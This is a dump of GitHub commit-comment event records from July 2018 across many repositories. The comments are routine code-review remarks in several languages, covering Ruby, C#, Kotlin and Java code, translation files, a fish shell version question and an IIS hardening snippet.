{"id":"7993837913","type":"CommitCommentEvent","actor":{"login":"thebear213"},"repo":{"name":"babyjie57/hello-world"},"payload":{"comment":{"id":29776270,"position":null,"line":null,"path":null,"commit_id":"8cb7cecd412f76b596449bc960e435f14552f4ad","created_at":"2018-07-20T09:09:47Z","updated_at":"2018-07-20T09:09:47Z","author_association":"NONE","body":"https://www.jianshu.com/p/8e9ef061a79b"}},"created_at":"2018-07-20T09:09:47Z"}
{"id":"7993843500","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29776283,"position":19,"line":34,"path":"package.json","commit_id":"397aa18117ac694eb3577580695a56d82bc48ffe","created_at":"2018-07-20T09:10:57Z","updated_at":"2018-07-20T09:10:57Z","author_association":"MEMBER","body":"This can probably be removed."}},"created_at":"2018-07-20T09:10:57Z"}
{"id":"7993857822","type":"CommitCommentEvent","actor":{"login":"davidbujic"},"repo":{"name":"davidbujic/Python"},"payload":{"comment":{"id":29776308,"position":null,"line":null,"path":null,"commit_id":"d17c3dd09d28e04010661139659a81cc4cbd21f8","created_at":"2018-07-20T09:13:55Z","updated_at":"2018-07-20T09:13:55Z","author_association":"OWNER","body":"U redu,hvala. Potrudicu se da nastavim ovako.\nPozdrav.\n\nOn Fri, Jul 20, 2018 at 11:08 dusanvel <notifications@github.com> wrote:\n\n> @davidbujic <https://github.com/davidbujic> ovo sad izgleda prilicno\n> *dobro*\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/davidbujic/Python/commit/d17c3dd09d28e04010661139659a81cc4cbd21f8#commitcomment-29776190>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am-I9BOZsliV0_XtVWtU-jxq92cnEslyks5uIZ4FgaJpZM4VXsb4>\n> .\n>\n"}},"created_at":"2018-07-20T09:13:55Z"}
{"id":"7993860043","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29776311,"position":5,"line":328,"path":"assembl/locale/fr/LC_MESSAGES/assembl.po","commit_id":"c850ab7f13528a686e27225d7c630d67ccfd7054","created_at":"2018-07-20T09:14:23Z","updated_at":"2018-07-20T09:14:23Z","author_association":"CONTRIBUTOR","body":"You need to remove the fuzzy flag otherwise you will not have the translation!"}},"created_at":"2018-07-20T09:14:23Z"}
{"id":"7993860854","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29776312,"position":14,"line":4822,"path":"assembl/locale/fr/LC_MESSAGES/assembl.po","commit_id":"c850ab7f13528a686e27225d7c630d67ccfd7054","created_at":"2018-07-20T09:14:33Z","updated_at":"2018-07-20T09:14:33Z","author_association":"CONTRIBUTOR","body":"You need to remove the fuzzy flag otherwise you will not have the translation!"}},"created_at":"2018-07-20T09:14:33Z"}
{"id":"7993862455","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29776316,"position":14,"line":4842,"path":"assembl/locale/de/LC_MESSAGES/assembl.po","commit_id":"c850ab7f13528a686e27225d7c630d67ccfd7054","created_at":"2018-07-20T09:14:52Z","updated_at":"2018-07-20T09:14:52Z","author_association":"CONTRIBUTOR","body":"You need to remove the fuzzy flag otherwise you will not have the translation!"}},"created_at":"2018-07-20T09:14:52Z"}
{"id":"7993865238","type":"CommitCommentEvent","actor":{"login":"ppatierno"},"repo":{"name":"strimzi/strimzi-kafka-operator"},"payload":{"comment":{"id":29776327,"position":5,"line":20,"path":"docker-images/kafka/scripts/kafka_tls_prepare_certificates.sh","commit_id":"bde1d0b6a5abcb497423fc5afe7facb0056da089","created_at":"2018-07-20T09:15:27Z","updated_at":"2018-07-20T09:15:27Z","author_association":"MEMBER","body":"@scholzj  I fixed this one with #616 already merged on master"}},"created_at":"2018-07-20T09:15:27Z"}
{"id":"7993872013","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776337,"position":37,"line":37,"path":"BlackJack/game.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T09:16:51Z","updated_at":"2018-07-20T09:16:51Z","author_association":"NONE","body":"вот этот рекурсивный вызов  - не самая удачная идея\r\nвот что я имею в виду\r\nя уменьшил размеры банка для игроков до 10 и сыграл несколько игр подряд потом вышел из программы по Ctrl + C\r\nвот трейс:\r\n```\r\nВаш выбор: ^CTraceback (most recent call last):\r\n\t15: from main.rb:11:in `<main>'\r\n\t14: from .../game.rb:25:in `play'\r\n\t13: from .../game.rb:37:in `game_over'\r\n\t12: from .../game.rb:25:in `play'\r\n\t11: from .../game.rb:37:in `game_over'\r\n\t10: from .../game.rb:25:in `play'\r\n\t 9: from .../game.rb:37:in `game_over'\r\n\t 8: from .../game.rb:19:in `play'\r\n\t 7: from .../game.rb:19:in `loop'\r\n\t 6: from .../game.rb:21:in `block in play'\r\n\t 5: from .../game.rb:58:in `play_round'\r\n\t 4: from .../game.rb:58:in `loop'\r\n\t 3: from .../game.rb:64:in `block in play_round'\r\n\t 2: from .../interface.rb:24:in `round_menu'\r\n\t 1: from .../interface.rb:24:in `gets'\r\n.../interface.rb:24:in `gets': Interrupt\r\n```\r\nвидишь вызовы `game_over`, `play` чередующиеся?\r\nони означают, что контексты всех сыгранных игр висят в памяти, что не очень хорошо\r\nу тебя конечно не много переменных в самой игре инициализируется, банк и дилер\r\nно решение не самое удачное\r\nправильней заменить рекурсию на петлю, как ты сделал с раундами"}},"created_at":"2018-07-20T09:16:51Z"}
{"id":"7993873764","type":"CommitCommentEvent","actor":{"login":"Totktonada"},"repo":{"name":"tarantool/graphql"},"payload":{"comment":{"id":29776341,"position":9,"line":39,"path":".travis.yml","commit_id":"82f5c6d8b004697930b01ebf85e73f07c4f36fec","created_at":"2018-07-20T09:17:14Z","updated_at":"2018-07-20T09:17:14Z","author_association":"MEMBER","body":"1. You are clone packpack twice.\r\n2. It is already here as a submodule (use `git submodule update --recursive --init`).\r\n3. `make rpm` calls it."}},"created_at":"2018-07-20T09:17:14Z"}
{"id":"7993875617","type":"CommitCommentEvent","actor":{"login":"FredKruse"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29776346,"position":null,"line":null,"path":null,"commit_id":"27fa0ac209e3dda6be48169694e2e9c3cad9fa78","created_at":"2018-07-20T09:17:38Z","updated_at":"2018-07-20T09:17:38Z","author_association":"CONTRIBUTOR","body":"This change is related to https://forum.languagetool.org/t/proposal-separate-the-type-of-a-rule-from-the-tab-on-which-it-appears/3179.\r\nA new attribute »tab = \"TabName\"« was added to »category«. All categories which share the same TabName are listed in a separate tab named TabName in the option panel. There may be more than one special tab.\r\nAll other categories are listed in the tabs »grammar« and »style« as before.\r\nIn addition, enabled default-off-categories are supported. This makes no difference for enabling/disabling rules but looks nicer at the option panel."}},"created_at":"2018-07-20T09:17:38Z"}
{"id":"7993877308","type":"CommitCommentEvent","actor":{"login":"LisaLandes"},"repo":{"name":"Deutsche-Digitale-Bibliothek/ddblabs-ddbtools-statistic"},"payload":{"comment":{"id":29776349,"position":null,"line":null,"path":null,"commit_id":"fa64ed6c50df430438c1f5122463a3aa801c1b48","created_at":"2018-07-20T09:17:57Z","updated_at":"2018-07-20T09:17:57Z","author_association":"NONE","body":"Dies ist die erste Statistik, die mit der inbetriebgenommenen neuen Architektur von \"DDB-2017\" erstellt wurde. Der Vergleich mit der Statistik der alten Architektur hat einige \"Änderungen\" markiert, von denen für die Statistik aber nur die Änderung bei digicult relevant ist. Hier wurden Objekte aus Produktion gelöscht, die fälschlicherweise dierkt digicult, statt dem eigentlichen Datenpartner zugeordnet waren. Gelöscht wurden 7.349 Objekte."}},"created_at":"2018-07-20T09:17:57Z"}
{"id":"7993879050","type":"CommitCommentEvent","actor":{"login":"junaruga"},"repo":{"name":"sass/ruby-sass"},"payload":{"comment":{"id":29776354,"position":null,"line":null,"path":null,"commit_id":"8b77fc88f8bdbc21b44d0a5be7833d91a5edb04c","created_at":"2018-07-20T09:18:16Z","updated_at":"2018-07-20T09:18:16Z","author_association":"CONTRIBUTOR","body":"@nex3 oh okay. Thanks for the replying."}},"created_at":"2018-07-20T09:18:16Z"}
{"id":"7993883832","type":"CommitCommentEvent","actor":{"login":"LisaLandes"},"repo":{"name":"Deutsche-Digitale-Bibliothek/ddblabs-ddbtools-statistic"},"payload":{"comment":{"id":29776361,"position":null,"line":null,"path":null,"commit_id":"006d1eb6ae8494a029be9d8eb65570f08eafa903","created_at":"2018-07-20T09:19:12Z","updated_at":"2018-07-20T09:19:12Z","author_association":"NONE","body":"Es gab in der vergangenen Woche keine Löschungen oder Ingests in Produktion. Es ist also korrekt, dass der Vergleich \"0 additions and 0 deletions\" ausgibt."}},"created_at":"2018-07-20T09:19:12Z"}
{"id":"7993886590","type":"CommitCommentEvent","actor":{"login":"alanz"},"repo":{"name":"Bubba/haskell-ide-engine"},"payload":{"comment":{"id":29776366,"position":47,"line":66,"path":"src/Haskell/Ide/Engine/Dispatcher.hs","commit_id":"c756f3a3156caeb1e241415f87c131a68c693266","created_at":"2018-07-20T09:19:45Z","updated_at":"2018-07-20T09:19:45Z","author_association":"NONE","body":"I saw a tweet recently that said it is better to use `concurrently` or `race` than `withAsync`.\r\n\r\nMy view is that if an exception occurs, it should rather bubble up to the very top and cause the server to crash, rather than have it go into a non-responsive mode.\r\n\r\nSo rethrowing the error makes sense."}},"created_at":"2018-07-20T09:19:45Z"}
{"id":"7993888352","type":"CommitCommentEvent","actor":{"login":"JoanneWilliams"},"repo":{"name":"JoanneWilliams/hello-world"},"payload":{"comment":{"id":29776369,"position":null,"line":null,"path":null,"commit_id":"335069cd0964da514df5025646ab90f1efd3f750","created_at":"2018-07-20T09:20:08Z","updated_at":"2018-07-20T09:20:08Z","author_association":"OWNER","body":"testing\r\n"}},"created_at":"2018-07-20T09:20:08Z"}
{"id":"7993888682","type":"CommitCommentEvent","actor":{"login":"scholzj"},"repo":{"name":"strimzi/strimzi-kafka-operator"},"payload":{"comment":{"id":29776370,"position":5,"line":20,"path":"docker-images/kafka/scripts/kafka_tls_prepare_certificates.sh","commit_id":"bde1d0b6a5abcb497423fc5afe7facb0056da089","created_at":"2018-07-20T09:20:12Z","updated_at":"2018-07-20T09:20:12Z","author_association":"MEMBER","body":"I know."}},"created_at":"2018-07-20T09:20:12Z"}
{"id":"7993890388","type":"CommitCommentEvent","actor":{"login":"Nezune"},"repo":{"name":"Galarzaa90/NabBot"},"payload":{"comment":{"id":29776372,"position":null,"line":null,"path":null,"commit_id":"258fd21d5c8d2c346410b39f78ad38a688190add","created_at":"2018-07-20T09:20:32Z","updated_at":"2018-07-20T09:20:32Z","author_association":"COLLABORATOR","body":"Accidentally a bunch of emojii. This is why you don't use fancy encodings around someone who codes with a badger and a spoon."}},"created_at":"2018-07-20T09:20:32Z"}
{"id":"7993894735","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/devbook"},"payload":{"comment":{"id":29776378,"position":5,"line":21,"path":"deploy_without_downtime/README.md","commit_id":"ebc273f125bcf1107302ab303f059e47191eea66","created_at":"2018-07-20T09:21:27Z","updated_at":"2018-07-20T09:21:27Z","author_association":"MEMBER","body":"I'm not sure if Heroku guarantees that the app servers have restarted with the new code before the migrations run. I think that's been the case so far, but I vaguely remember that maybe once, the migrations ran before the apps were restarted? If we need to account for that then we need to split things up further."}},"created_at":"2018-07-20T09:21:27Z"}
{"id":"7993898553","type":"CommitCommentEvent","actor":{"login":"kerautret"},"repo":{"name":"TC-18/tc18.org"},"payload":{"comment":{"id":29776382,"position":null,"line":null,"path":null,"commit_id":"308b7ee279f9adebbcdecb1a139c6fa7eb313508","created_at":"2018-07-20T09:22:14Z","updated_at":"2018-07-20T09:22:14Z","author_association":"MEMBER","body":"👌👍 @dcoeurjo  thanks all work nice now from www. or not certificate issue fixed 🍾🎉"}},"created_at":"2018-07-20T09:22:14Z"}
{"id":"7993899592","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29776388,"position":null,"line":null,"path":null,"commit_id":"aeb326640a99f6c68b175e9aff3daf0818e9e916","created_at":"2018-07-20T09:22:27Z","updated_at":"2018-07-20T09:22:27Z","author_association":"NONE","body":"thanks for this script.  using in anger to harden up IIS. i did find a few minor changes were required.\r\n\r\nfor example: 7.1 i have this which seems to work\r\n\r\n  ```\r\n  $httpProtocolPath = \"system.webServer/httpProtocol\"\r\n        $httpProtocolSection = $Configuration.GetSection($httpProtocolPath)\r\n               \r\n\r\n        $customHeadersCollection = $httpProtocolSection.GetCollection(\"customHeaders\")\r\n\r\n\r\n        $customHeader = $customHeadersCollection | select rawattributes | select -ExpandProperty * | Where-Object {\r\n                                $name = $_ | Get-IISConfigAttributeValue -AttributeName \"name\"\r\n                                $value = $_ | Get-IISConfigAttributeValue -AttributeName \"value\"\r\n                                ($name -eq \"StrictTransport-Security\") -and ($value -contains \"*max-age*\") \r\n                            }\r\n       \r\n\r\n```\r\n\r\n"}},"created_at":"2018-07-20T09:22:27Z"}
{"id":"7993899854","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776389,"position":31,"line":1573,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"600389bcedc4bd79572f550d22597c59a140f25c","created_at":"2018-07-20T09:22:30Z","updated_at":"2018-07-20T09:22:30Z","author_association":"MEMBER","body":"Please, annotate the parameters with nullability annotations"}},"created_at":"2018-07-20T09:22:30Z"}
{"id":"7993901281","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776394,"position":1,"line":1,"path":"BlackJack/bank.rb","commit_id":"a4a0dcd2c0438d6a364fe5202fc34b13b30ed6b1","created_at":"2018-07-20T09:22:48Z","updated_at":"2018-07-20T09:22:48Z","author_association":"NONE","body":"еще если неверно ввести выбор в раунде, то прога падает:\r\n```\r\n1. Пасс\r\n2. Взять карту\r\n3. открыть карты\r\nВаш выбор: e\r\nНекорректный ввод\r\nTraceback (most recent call last):\r\n\t8: from main.rb:11:in `<main>'\r\n\t7: from .../game.rb:19:in `play'\r\n\t6: from .../game.rb:19:in `loop'\r\n\t5: from .../game.rb:21:in `block in play'\r\n\t4: from .../game.rb:58:in `play_round'\r\n\t3: from .../game.rb:58:in `loop'\r\n\t2: from .../game.rb:64:in `block in play_round'\r\n\t1: from .../interface.rb:26:in `round_menu'\r\n.../interface.rb:26:in `raise': exception object expected (TypeError)\r\n```\r\n"}},"created_at":"2018-07-20T09:22:48Z"}
{"id":"7993914832","type":"CommitCommentEvent","actor":{"login":"C-Bouthoorn"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":29776423,"position":null,"line":null,"path":null,"commit_id":"c7a682ed050e204b4640da19434da7c53501d1f4","created_at":"2018-07-20T09:25:23Z","updated_at":"2018-07-20T09:25:23Z","author_association":"NONE","body":"Okay, this is weird. I have the latest version of fish `2.7.1`, which was created in December 2017, so after this was merged to master. However, it doesn't seem to include the `wait` command:\r\n\r\n```fish\r\n$ fish --version\r\nfish, version 2.7.1\r\n$ wait\r\nfish: Unknown command 'wait'\r\n$ builtin -n\r\n[\r\nand\r\nargparse\r\nbegin\r\nbg\r\nbind\r\nblock\r\nbreak\r\nbreakpoint\r\nbuiltin\r\ncase\r\ncd\r\ncommand\r\ncommandline\r\ncomplete\r\ncontains\r\ncontinue\r\ncount\r\ndisown\r\necho\r\nelse\r\nemit\r\nend\r\nexec\r\nexit\r\nfalse\r\nfg\r\nfor\r\nfunction\r\nfunctions\r\nhistory\r\nif\r\njobs\r\nnot\r\nor\r\nprintf\r\npwd\r\nrandom\r\nread\r\nrealpath\r\nreturn\r\nset\r\nset_color\r\nsource\r\nstatus\r\nstring\r\nswitch\r\ntest\r\ntrue\r\nulimit\r\nwhile\r\n```"}},"created_at":"2018-07-20T09:25:23Z"}
{"id":"7993915675","type":"CommitCommentEvent","actor":{"login":"samarohith"},"repo":{"name":"firebase/functions-samples"},"payload":{"comment":{"id":29776427,"position":null,"line":null,"path":null,"commit_id":"beec8609cf4abfa9826ee404eda7469e8d329bcb","created_at":"2018-07-20T09:25:34Z","updated_at":"2018-07-20T09:25:34Z","author_association":"NONE","body":"This function doesn't seem to work ,data is getting deleted immediately after the write"}},"created_at":"2018-07-20T09:25:34Z"}
{"id":"7993919485","type":"CommitCommentEvent","actor":{"login":"snuyanzin"},"repo":{"name":"ipatina/calcite"},"payload":{"comment":{"id":29776435,"position":5,"line":76,"path":"core/src/main/java/org/apache/calcite/sql/fun/SqlMonotonicBinaryOperator.java","commit_id":"890c83b71ae98bdcf5f2396cd378a048d82b2014","created_at":"2018-07-20T09:26:21Z","updated_at":"2018-07-20T09:26:21Z","author_association":"NONE","body":"would be reasonable to write something like this\r\n`BigDecimal value = call.getOperandLiteralValue(1, BigDecimal.class);`\r\n`switch (value == null ? 1 : value.signum())`\r\nit is shorter and clearer"}},"created_at":"2018-07-20T09:26:21Z"}
{"id":"7993922470","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776442,"position":65,"line":65,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:26:57Z","updated_at":"2018-07-20T09:26:57Z","author_association":"NONE","body":"ArrayList выполняет поиск по индексу, благодаря этому у него как раз константная сложность. \r\nПоэтому remove есть двух типов : \r\n1. remove(int) - просто ищешь по индексу в массиве и если int > size -> exception , это константная сложность\r\n2. remove(object) - для этого метода надо вызываешь equals  с объектов этих, сложность тут не помню точно, но, вроде, линейная, гавно метод\r\n\r\nв любом случае после каждого remove должен быть метод resize, т.к. всегда проверяется на случай, если вдруг массив стал меньше, чем надо, то его уменьшает в размерах. \r\nДля resize надо добавить ещё одно поле, которое будет просто счётчиком элементов в коллекции. Так и назови - counter. При добавлении элемента counter++, при удалении counter-- и для addRange так же, только с длиной массива. Насчёт того, когда вызывать resize, то есть алгоритм, который придумали как оптимальный.Аля:\r\n\r\n`  private final int INIT_SIZE = 16;\r\n   private final int CUT_RATE = 4;\r\n   public void remove(int index) {\r\n    //тут удаление \r\n      if (array.length > INIT_SIZE && pointer < array.length / CUT_RATE) \r\n         resize(array.length/2); // если элементов в CUT_RATE раз меньше чем \r\n                                 // длина массива, то уменьшу в два раза\r\n   }\r\n private void resize(int newLength) {\r\n      Object[] newArray = new Object[newLength];\r\n      System.arraycopy(array, 0, newArray, 0, pointer);\r\n      array = newArray;\r\n   }      \r\n`\r\n\r\nЭто так, условно, что бы понял структуру"}},"created_at":"2018-07-20T09:26:57Z"}
{"id":"7993923600","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776445,"position":8,"line":8,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:27:10Z","updated_at":"2018-07-20T09:27:10Z","author_association":"NONE","body":"поле size"}},"created_at":"2018-07-20T09:27:10Z"}
{"id":"7993923949","type":"CommitCommentEvent","actor":{"login":"snuyanzin"},"repo":{"name":"ipatina/calcite"},"payload":{"comment":{"id":29776446,"position":4,"line":490,"path":"core/src/main/java/org/apache/calcite/sql/SqlLiteral.java","commit_id":"890c83b71ae98bdcf5f2396cd378a048d82b2014","created_at":"2018-07-20T09:27:14Z","updated_at":"2018-07-20T09:27:14Z","author_association":"NONE","body":"It makes sense to move exception raising down and may be add comment of for the reason of that"}},"created_at":"2018-07-20T09:27:14Z"}
{"id":"7993926939","type":"CommitCommentEvent","actor":{"login":"snuyanzin"},"repo":{"name":"ipatina/calcite"},"payload":{"comment":{"id":29776455,"position":22,"line":152,"path":"core/src/main/java/org/apache/calcite/sql/fun/SqlMonotonicBinaryOperator.java","commit_id":"890c83b71ae98bdcf5f2396cd378a048d82b2014","created_at":"2018-07-20T09:27:47Z","updated_at":"2018-07-20T09:27:47Z","author_association":"NONE","body":"the method could removed because of the comment above"}},"created_at":"2018-07-20T09:27:47Z"}
{"id":"7993927377","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29776457,"position":24,"line":24,"path":"021/2102.html","commit_id":"318592bcbc187c7e46eda45771413319b4018cca","created_at":"2018-07-20T09:27:52Z","updated_at":"2018-07-20T09:27:52Z","author_association":"COLLABORATOR","body":"@c-osanai \r\nいいですね！できていますね！\r\nちょっとした追加課題として\r\n通信中はローディング画像を表示してみましょう。\r\n\r\n![loading](https://user-images.githubusercontent.com/8462476/42994939-7b70c7a4-8c4a-11e8-8900-248175392625.png)\r\n\r\nただ通信が一瞬で終わってしまうかと思いますので、`setTimeout()` をつかって調整してみましょう！"}},"created_at":"2018-07-20T09:27:52Z"}
{"id":"7993927603","type":"CommitCommentEvent","actor":{"login":"liuxiaohe000"},"repo":{"name":"liuxiaohe000/springBoot"},"payload":{"comment":{"id":29776458,"position":null,"line":null,"path":null,"commit_id":"48f4a595bbfed8166aa0841906674d7bf3d907f1","created_at":"2018-07-20T09:27:54Z","updated_at":"2018-07-20T09:27:54Z","author_association":"OWNER","body":"第一次提交"}},"created_at":"2018-07-20T09:27:54Z"}
{"id":"7993929542","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776462,"position":82,"line":3692,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"600389bcedc4bd79572f550d22597c59a140f25c","created_at":"2018-07-20T09:28:14Z","updated_at":"2018-07-20T09:28:14Z","author_association":"MEMBER","body":"Looks like this parameter can be replaced with a variable defined as `lhsKotlinType?.asmType()`?"}},"created_at":"2018-07-20T09:28:14Z"}
{"id":"7993930146","type":"CommitCommentEvent","actor":{"login":"snuyanzin"},"repo":{"name":"ipatina/calcite"},"payload":{"comment":{"id":29776464,"position":5,"line":2007,"path":"core/src/test/java/org/apache/calcite/sql/test/SqlOperatorBaseTest.java","commit_id":"890c83b71ae98bdcf5f2396cd378a048d82b2014","created_at":"2018-07-20T09:28:20Z","updated_at":"2018-07-20T09:28:20Z","author_association":"NONE","body":"`select 2 as x from (values (true))` could be replaced with just `select 2 as x `"}},"created_at":"2018-07-20T09:28:20Z"}
{"id":"7993931174","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776465,"position":12,"line":12,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:28:33Z","updated_at":"2018-07-20T09:28:33Z","author_association":"NONE","body":"Нет самого главное  - метод **get(int)**\r\nВозвращать должен из массива по индексу элемент, аля `return (T) array[index]`"}},"created_at":"2018-07-20T09:28:33Z"}
{"id":"7993936349","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776471,"position":14,"line":14,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:29:37Z","updated_at":"2018-07-20T09:29:37Z","author_association":"NONE","body":"Добавление происходит в последнюю ячейку массива, номер которой хранится в том счётчике (ниже писал)\r\nНо перед добавлением выполнить resize, если надо"}},"created_at":"2018-07-20T09:29:37Z"}
{"id":"7993940164","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776476,"position":23,"line":23,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:30:23Z","updated_at":"2018-07-20T09:30:23Z","author_association":"NONE","body":"resize() только если не влезает добавляемая коллекция "}},"created_at":"2018-07-20T09:30:23Z"}
{"id":"7993942023","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776484,"position":24,"line":24,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:30:43Z","updated_at":"2018-07-20T09:30:43Z","author_association":"NONE","body":"и потом добавляешь в последнюю ячейку"}},"created_at":"2018-07-20T09:30:43Z"}
{"id":"7993942088","type":"CommitCommentEvent","actor":{"login":"kprzerwa"},"repo":{"name":"CERNDocumentServer/cds-videos"},"payload":{"comment":{"id":29776485,"position":55,"line":291,"path":"cds/modules/records/tasks.py","commit_id":"9907b2c6664d2c617c86d8fef873d2627ef63cd1","created_at":"2018-07-20T09:30:44Z","updated_at":"2018-07-20T09:30:44Z","author_association":"CONTRIBUTOR","body":"Hi @ioanungurean!\r\nI was testing the PR on qa, and this line has:\r\nUnboundLocalError: local variable 'e' referenced before assignment\r\ncould you take a look?"}},"created_at":"2018-07-20T09:30:44Z"}
{"id":"7993943734","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29776488,"position":139,"line":3848,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/ExpressionCodegen.java","commit_id":"600389bcedc4bd79572f550d22597c59a140f25c","created_at":"2018-07-20T09:31:03Z","updated_at":"2018-07-20T09:31:03Z","author_association":"MEMBER","body":"Probably, I'd create helper methods for frequently used StackValue's ones like `put`, `store`, `onStack`, etc.\r\nSo, the would accept kotlin type and mapped it to asm type themselves.\r\n\r\nBut, I'm not sure it'd better, so it's up to you "}},"created_at":"2018-07-20T09:31:03Z"}
{"id":"7993947838","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776494,"position":7,"line":7,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:31:50Z","updated_at":"2018-07-20T09:31:50Z","author_association":"NONE","body":"Не инициализируй массив через прямое добавление константы в конструктор, это хардкод\r\nСоздай лучше отдельную константу INIT_SIZE и через неё\r\nЭто не ошибка, просто так принято\r\n"}},"created_at":"2018-07-20T09:31:50Z"}
{"id":"7993951807","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29776499,"position":14,"line":7,"path":"BlackJack/deck.rb","commit_id":"2e552c3aa9f009493fbcc1b53fa0c9246557943a","created_at":"2018-07-20T09:32:38Z","updated_at":"2018-07-20T09:32:38Z","author_association":"NONE","body":"вот эта структура конечно вызывает вопросы ))\r\n\r\n1. это ж пришлось ручками хардкодить, т.е. какое-то противоречие со стремлением программистов все поручить машине... здесь же по идее структура поддается алгоритмизации...\r\n    - четыре масти\r\n    - 13 возможных значений для каждой масти\r\nкажется логичным создание этой структуры \"автоматом\" по алгоритму\r\n2. возможно более правильным вариантом здесь было бы создание колоды из объектов класса Карта, но это наверное уже не меняй, твой вариант рабочий"}},"created_at":"2018-07-20T09:32:38Z"}
{"id":"7993952784","type":"CommitCommentEvent","actor":{"login":"kapmelkut"},"repo":{"name":"kapmelkut/weather_app"},"payload":{"comment":{"id":29776502,"position":null,"line":null,"path":null,"commit_id":"84ed1c6aa06bcbdb4ba4b1dbdfb13ae1f8e8915e","created_at":"2018-07-20T09:32:50Z","updated_at":"2018-07-20T09:32:50Z","author_association":"OWNER","body":"it is awesome bro maintain the spirit "}},"created_at":"2018-07-20T09:32:50Z"}
{"id":"7993953527","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776504,"position":45,"line":45,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:32:59Z","updated_at":"2018-07-20T09:32:59Z","author_association":"NONE","body":"в цикле ищешь элемент в массиве и в зависимости от того, есть или нет, то возвращаешь"}},"created_at":"2018-07-20T09:32:59Z"}
{"id":"7993956911","type":"CommitCommentEvent","actor":{"login":"Scorpion2510"},"repo":{"name":"Scorpion2510/y2p"},"payload":{"comment":{"id":29776508,"position":null,"line":null,"path":null,"commit_id":"2459138a3eb8ba944dd3fe2491fe1dfe9d2fdb85","created_at":"2018-07-20T09:33:41Z","updated_at":"2018-07-20T09:33:41Z","author_association":"OWNER","body":"thx\r\n\r\n"}},"created_at":"2018-07-20T09:33:41Z"}
{"id":"7993957145","type":"CommitCommentEvent","actor":{"login":"MikhailovOlegM"},"repo":{"name":"Yavd3341/Training"},"payload":{"comment":{"id":29776510,"position":50,"line":50,"path":"Solutions5/Lists/ArrayList.cs","commit_id":"8a21f216db6a097385dfab7d74ccd52474b2708d","created_at":"2018-07-20T09:33:44Z","updated_at":"2018-07-20T09:33:44Z","author_association":"NONE","body":"Так ты можешь вернуть null, а тут если в массиве ничего не будет, то сперва надо проверить, есть ли что-то на первой позиции"}},"created_at":"2018-07-20T09:33:44Z"}
